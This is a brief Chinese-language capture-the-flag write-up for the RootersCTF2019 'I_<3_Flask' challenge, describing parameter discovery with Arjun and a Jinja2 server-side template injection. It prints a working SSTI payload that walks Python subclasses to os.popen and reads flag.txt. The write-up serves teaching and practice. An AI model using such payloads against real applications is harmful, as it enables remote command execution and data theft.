[RootersCTF2019]I_<3_Flask

题目考点

首先题目的名称就是Flask,那么这个题目就可能是考的Flask的模板注入(SSTI)

主要的难点还是在找到参数

查找参数

这里可以利用Arjun这个HTTP参数发现工具查询传递的参数

image-20220228155921838

SSTI

然后进行一个简单的SSTI

?name={{%27%27.__class__.__base__.__subclasses__()[222].__init__.__globals__["os"].popen(%27cat%20flag.txt%27).read()}}

image-20220228160103047

注:其中找到利用函数的位置可以通过脚本定位

posted @ 2022-02-28 16:07  Townmacro  阅读(178)  评论(0编辑  收藏  举报